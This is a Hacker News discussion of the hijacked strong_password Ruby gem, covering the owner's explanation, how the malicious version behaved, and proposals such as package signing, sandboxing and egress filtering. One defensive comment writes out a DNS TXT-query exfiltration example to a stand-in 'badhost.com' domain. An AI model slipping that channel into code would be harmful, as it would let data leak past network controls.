top | item 20377136

Strong_password Rubygem hijacked

625 points| jrochkind1 | 6 years ago |withatwist.dev | reply

128 comments

order
[+] bdmac97|6 years ago|reply
Hi all. I'm the (actual) owner of that gem.

As already hypothesized in the comments I'm pretty sure this was a simple account hijack. The kickball user likely cracked an old password of mine from before I was using 1password that was leaked from who knows which of the various breaches that have occurred over the years.

I released that gem years ago and barely remembered even having a rubygems account since I'm not doing much OSS work these days. I simply forgot to rotate out that old password there as a result which is definitely my bad.

Since being notified and regaining ownership of the gem I've:

1. Removed the kickball gem owner. I don't know why rubygems did not do this automatically but they did not.

2. Reset to a new strong password specific to rubygems.org (haha) with 1password and secured my account with MFA.

3. Released a new version 0.0.8 of the gem so that anyone that unfortunately installed the bogus/yanked 0.0.7 version will hopefully update to the new/real version of the gem.

[+] confiq|6 years ago|reply
one more reason why to use a password manager and have a unique password.

Thanks for sharing the info!

[+] nneonneo|6 years ago|reply
This is a gem that checks the strength of a user-submitted password. It has a large number of downloads (37,000 on the legitimate 0.0.6 version). It looks like it's made to be integrated on webservers.

The modified gem downloaded and executed code stored in a editable Pastebin, meaning that the code could have changed at any time. Presumably, the malicious code would activate just by browsing any page on the affected site. One version of the Pastebin code would execute any code embedded in a magic cookie sent by a client. Plus, it would ping the attacker's server to let them know your webserver was infected.

Nasty, nasty stuff.

[+] djur|6 years ago|reply
Good analysis, but I'm not sure about "a large number of downloads". Download counts can be pretty inflated due to CI/deployment processes that reinstall gems from scratch repeatedly. I've seen open-sourced gems that never got any real usage outside their original company get that number of downloads.

To add a bit of a sense of scale here, the popular Devise gem that's used for authentication in many Rails apps has 52.7 million total downloads and almost 20k stars on GitHub. strong_password has 247k total downloads and 191 stars. It has three reverse dependencies, none of which I've ever heard of and none of which have any of their own reverse dependencies.

This suggests to me that this gem is used by less than 1% of Ruby web apps (probably substantially less) and, more importantly, if you have a dependency on this gem you probably know (because it'd be a direct dependency in your Gemfile, not a dependency of a dependency).

[+] MrStonedOne|6 years ago|reply
The unanswered question is still how this `kickball` account gained control of the gem.

> The gem seems to have been pulled out from under me… When I login to rubygems.org I don’t seem to have ownership now. Bogus 0.0.7 release was created 6/25/2019.

The way I see it, there are a few options:

1. The rubygem was transferred by ruby staff to this account.

2. The maintainer's account was hijacked and then it was transferred, and could even still be compromised.

3. There is some issue or attack vector with the rubygem system that allowed the attacker to gain control.

Any guesses?

[+] zbentley|6 years ago|reply
Option 2 is overwhelmingly likely, IMO. Phishing, password reuse, credential scraping/spamming, and plain old brute force are unbelievably common.

That said, the other two options bear investigation too. Just don't spend time looking for a cold breeze from an un-caulked window frame when the screen door is open.

[+] romaaeterna|6 years ago|reply
Yes. I think that we need to see a full security report from rubygems.org on this. This could be bigger than just the one package.
[+] jakobegger|6 years ago|reply
Or:

4. The maintainer of the gem is complicit in the attack, and transferred ownership voluntary.

[+] nurettin|6 years ago|reply
Not sure why someone with malicious intent would use their rubygems superpower just to compromise a low profile gem like this. Perhaps it is a targeted attack at a certain website which may now be compromised and we are just seeing the tip of the iceberg.
[+] fasterdom|6 years ago|reply
We need a sort of capability and permission method for libraries.

For example a "strong_password" library should only by given "CPU compute" permissions, no I/O.

But even with this, the problem will be like we see on phone, popular libraries will require all the permissions.

You'll want to install React, and React + it's 100 dependencies will request everything.

[+] kibwen|6 years ago|reply
To be honest, even the coarsest-possible permissions of "can do I/O" vs. "can't do I/O" would be exceedingly effective at stymieing these sorts of attacks; all malicious software of this sort needs to do I/O at some point, and relatively few libraries actually have a good excuse to do I/O (though logging might be thorny).

That said it seems easier said than done to impose those sorts of restrictions on a per-dependency basis. Attempts to statically verify the absence of I/O sounds like a great game of whack-a-mole, and I don't know how you'd do it dynamically without running all non-I/O dependencies in an entirely separate process from the main program.

[+] rgovostes|6 years ago|reply
The design of macOS and iOS has been moving this way. Many of Apple's first-party applications and frameworks have been broken down into backend "XPC services" that (attempt to) follow the principle of least privilege[1]. Each service runs in a separate process, the system enforcing memory isolation and limiting access to resources (sandboxing).

It's a good idea on paper, but has caveats. Every service is responsible for properly authenticating its clients, and needs to be designed so that a compromised client cannot leverage its access to a service to elevate privileges. Sandboxes are difficult to retrofit onto existing programs. The earlier, lowest-common-denominator system frameworks were not originally written with sandboxing in mind. There are numerous performance drawbacks.

For Apple ecosystem developers, XPC services are also how "extensions" for VPN, Safari ad blockers, etc. are written, for a mix of security and stability benefits.

Though funnily enough, as Apple has pursued these technologies, many HN commenters have decried the walls of the garden closing in.

1: https://en.wikipedia.org/wiki/Principle_of_least_privilege

[+] nneonneo|6 years ago|reply
Hm, interesting. One way to solve this would be to have a language with a very rigid import system - it should be _impossible_ for a library to use a module it hasn't imported, even if that module has been loaded elsewhere in a process. This is probably harder than it looks, and many languages have introspection features that are incompatible with this goal.

With a rigid import system, each library would be forced to declare what it's going to import (including any system libraries), and then you could e.g. enforce a warning + confirmation any time an updated dependency changes its import list.

It doesn't prevent you from getting owned by a modified privileged library, but it's better than the current case. Unfortunately, it probably requires some language (re-)design to fully implement this approach.

[+] derefr|6 years ago|reply
If you look at dependencies as black-boxes that contain their own transitive dependencies, then sure, any given "root-level" dependency of sufficient complexity might end up requesting every permission.

On the other hand, if each dependency in the deps tree had its own required permissions, and you had to grant those permissions to that specific dependency rather than to the rootmost branch of the deps tree that contained it, then things would be a lot nicer. The more fine-grained library authors were in splitting out dependencies, the clearer the permissions situation would be; it'd be clear that e.g. a "left-pad" package way down in the tree wouldn't need any system access.

On the other hand, it'd make sense if dependencies could only add new transitive dependencies during "version update due to automatic version-constraint re-evaluation" if the computed transitive closure of the required permissions didn't increase. Otherwise it'd stop and ask you whether you wanted to authorize the addition of a dep that now asked for these additional permissions.

[+] dwohnitmok|6 years ago|reply
Safe Haskell, a GHC extension, is one example in this space. https://downloads.haskell.org/~ghc/latest/docs/html/users_gu...

Its biggest selling point is that a lot of capability safety could be inferred in packages without the package author separately specifying capabilities.

The basic idea is to disallow the remaining impure escape hatches in Haskell in most code, requiring library authors of libraries that do require those escape hatches (e.g. wrappers around C libraries) to assert that their library is trustworthy, and requiring users to accept that trustworthy declaration in a per-user database.

It actually was very promising because the general coding conventions within Haskell libraries made most of them automatically safe, so the set of packages you needed to manually verify wasn't insane (but still unfortunately not a trivial burden, especially if your packages relied on a lot of C FFI).

Unfortunately I have yet to see it used in any commercial projects and it seems in general not to get as much attention as some other GHC extensions.

[+] mopierotti|6 years ago|reply
I know this is about ruby, but it's worth noting that this kind of thing would be solved by effect systems, e.g. Haskell's IO type. If IO isn't part of the signature, you know it's cpu only. Furthermore, you can get more specific such as having a DB type to indicate some code only has access to databases rather than the internet as a whole.
[+] rdhatt|6 years ago|reply
The .NET Framework 1.0 included "Code Access Security" which included mechanisms to authenticate code with "evidence" (as opposed to traditional 'roles') and the apply permissions similar to your example: DnsPermission, FileIOPermission, RegistryPermission, UIPermission, and so on.

Unfortunately, the architecture was too complex for most developers and fell to the wayside. It was finally removed from the 4.0 Framework after being deprecated for some time.

Sources:

https://www.itwriting.com/blog/2156-the-end-of-code-access-s...

https://www.codemag.com/Article/0405031/Managing-.NET-Code-A...

https://blog.codinghorror.com/code-access-security-and-bitfr...

[+] crabl|6 years ago|reply
Couldn't you theoretically shove all of your untrusted "non-I/O" libraries into a Service Worker? They wouldn't have direct access to the DOM or network I/O that way. It would involve writing some glue code, but perhaps it's worth trading that off for increased "security" (trust)?

EDIT: never mind, looks like I was mistaken about the network i/o part of this... Might be interesting to have a browser-level "sandboxed service worker" for this purpose though...

[+] sigotirandolas|6 years ago|reply
The skeptic in me thinks that it's never going to work in practice due to 'worse is better': Any system with the 'I/O vs no-I/O' system will have more friction than one without it, and there is no measurable benefit until you get hacked, so most people will not use it (or declare everything as I/O).
[+] elwell|6 years ago|reply
That is a brilliant idea. I'm surprised I haven't heard/thought of that yet.
[+] westoque|6 years ago|reply
In light of vulnerabilities like these, I’m glad there are developers that spend time to make their apps more secure. Thus, making us all aware that issues like these are out there. Security is almost always just put off in exchange for features and security is most of the time taken for granted. It’s about time that we start taking it seriously.

Kudos to you!

[+] frizkie|6 years ago|reply
It seems to me like the only way to really provide any sense of security is to force gems uploaded to RubyGems to be signed. There is some discussion here (https://github.com/rubygems/guides/pull/70) about why the Rubygems PGP CA isn't really worth using in its current state. As we've seen with Javascript dependencies, we can only put off dealing with this problem for so long.
[+] danShumway|6 years ago|reply
Just as an experiment, I want everyone on this thread to think back to the last time you connected over SSH to a new computer on a company network. Did you check to make sure that the key that popped up was correct, or did you just hit accept?

This is why signing packages will not be a silver bullet that significantly reduces these kinds of attacks. Devs will still have their keys compromised, users will still ignore warnings that keys have changed. It's worth doing, but I am skeptical that it will eliminate these attacks.

In the Javascript world, we got malware recently that was the result of a dev voluntarily giving control of a package to another person. Signing isn't going to help with that.

My vote is on permissions and sandboxing. I think that sandboxing scales reasonably well since it can be applied to dependencies of dependencies all the way down your entire chain. I think that (unlike with phones) most dependencies don't require stuff like File I/O or Networking, which would eliminate a large number of attacks.

And importantly, I think that sandboxing acknowledges that trust is not binary. The big problem with signing packages is that it's following this outdated model of, "well, you'll either trust a package completely or you won't." The reality is that there are packages and package authors that you trust to different degrees and in different contexts. Many buildings have locks inside of them as well as outside, because trusting someone enough to come into your office is not the same as trusting them to root through all of your filing cabinets.

I don't think efforts around verifying authors/updates are useless, but they do often fail to take this principle into account.

[+] javagram|6 years ago|reply
Another solution would be changing the ecosystem to no longer be reliant on so many third party dependencies.

For instance if I am using Java and I build my web app with only Spring Framework, I can have a lot more confidence that one of my JARs hasn’t been backdoored than I can in an ecosystem where it’s regularly the practice to pull 100s of dependencies from different individual FOSS developers, where it’s difficult to audit the process that each library author is using to secure their package manager upload credentials.

I am not sure signatures are that useful since without a centralized authority to issue the certificates and securely verify author identities, we are just back to a trust-on-first-use policy for the signatures, and people will just end up setting their CI servers to always trust new signatures since they won’t want to deal with what happens when authors change their certificate from version to version (which will surely happen).

[+] est31|6 years ago|reply
Requiring signatures moves all responsibility to the maintainers. I've seen projects upload their signing private keys to git, saying that it's fine because they are passphrase protected.

Sure, as 2FA, signatures help with the problem that some people use weak passwords or share their passwords. But IMO it would be better to restrict upload rights to the top 100 maintainers and give them hsms they use to authenticate those uploads. Anyone wanting to upload would have to ask one of the maintainers to sponsor them. This would reduce the number of people you have to trust when building anything from the package repository.

[+] yarg|6 years ago|reply
Yep, we get the same shit with both NPM and Maven.

It's staggering the lack of consideration given to basic security by what should be competent software engineers.

[+] oomkiller|6 years ago|reply
There's still a lot to learn about this incident, but most likely the RubyGems account was compromised, allowing the attacker to upload whatever they wanted. Signed releases with a web of trust would be ideal, but I doubt we'll ever see that world. A simple and pragmatic solution would be to have the next version of bundler support the ability to only install packages published with 2 factor enabled, then the next major rails version default it to on, with plenty of advanced warning in 6.x/bundler. This still has plenty of gaps, such as an attacker being able to take over even with 2 factor, and then re-enabling it with their own keys, or RubyGems.org itself being compromised. It still represents a major upgrade in security for the entire Ruby ecosystem without causing much pain to authors and users.
[+] jlmorton|6 years ago|reply
This is a great reason why you should never allow unknown outgoing connections from Production.

You can implement this however makes sense for you. For me, the easiest thing is to run a simple locked down proxy server, and allow only specific domains there. This makes it easy to setup whatever rules you want, allowing entire domains, or only specific hosts. And it gives you a convenient place to log entries before you lock them down.

This is also why you shouldn't allow external DNS resolution from every host in your network. It would be just as easy to move data in and out with Dnsruby::Resolver.query('base64-encoded-payload.badhost.com', 'TXT'), 255 bytes at a time.

Once everything is moving through your proxy, there's no need to allow external DNS resolution from other hosts.

[+] zelon88|6 years ago|reply
If an attacker has the ability to send dig queries to a remote host, he can over-ride anything you put in place on the host to prevent external DNS queries.

Also, most of this traffic is still unencrypted and dig'ging strange severs is noisy as hell. I'm pretty sure (famous last words) that most entry-level firewalls would flag this out of the box. If they don't, they should.

Still upvoted you though. This is an exfiltration technique that is really easy to spot and not widely known about.

[+] hirundo|6 years ago|reply
> I went line by line linking to each library’s changeset. This due diligence never reported significant surprises to me, until this time.

Mad props to the author, Tute Costa, for doing this. It's a large investment of time for usually no return, so I think very few people do. And his (?) reaction to finding this was quite effective.

Thank you for your service sir.

[+] sudhirj|6 years ago|reply
The way I see it, the root of the problem is that there isn't an independently verifiable association between a package and code commit hash that it's been generated from. My GitHub page can have good code, but no one has any idea what's in the corresponding package.

Does the upcoming builtin package manager on GitHub solve this problem? Does it guarantee that packages are only built from code pushed to GitHub and that associate the commit hash in the metadata in some way?

[+] huxflux|6 years ago|reply
Rubygem should contract an external auditor (security firm), this could go way deeper. Until they perform a throughout audit I will personally stay away from this project.
[+] FDSGSG|6 years ago|reply
So why does this not apply to everything?

If "this could go way deeper" is your answer to a super unpopular rubygem getting hijacked, why isn't that just the default assumption then?

Do you only use thoroughly audited software projects? How do you manage that?

[+] raesene9|6 years ago|reply
How do you suggest that Rubygems fund that effort? Also when you're staying away from Rubygems, which alternative will you be using, and do you think they have better security?
[+] archy_|6 years ago|reply
Incidents like this really show the lack of proper security measures in place. Why should package ownership be able to be arbitrarily shifted on a whim? It's a large signle point of failure. Sadly, there are no good alternatives besides entering in in GitHub repo paths manually for now.
[+] 1337shadow|6 years ago|reply
We really need more signing support in language specific packaging.
[+] Papirola|6 years ago|reply
why not just restrict the production environment to not open ports other than 80 and not to create TCP channels to unauthorized hosts?
[+] acdha|6 years ago|reply
It’s effective but tends to be a considerable amount of work to maintain, especially since the web is more dynamic these days: imagine what it would take to filter only authorized connections to a service hosted on AWS, for example, where anyone in the world can get IPs in the possible range and even put data on white-listed hostnames like S3. You’re basically building an allow list of host names, intermediating every update path, etc. and dealing with things which were designed with a more open model — e.g. do you disable things like OCSP or whitelist more third-party resources?

This also heavily encourages microservices since most non-trivial applications will have some reason to connect to fairly arbitrary resources. Hopefully that can be sandboxed well but relatively few apps were designed that way and that general class of missing things which weren’t supposed to work is notoriously easy for even experienced teams to miss.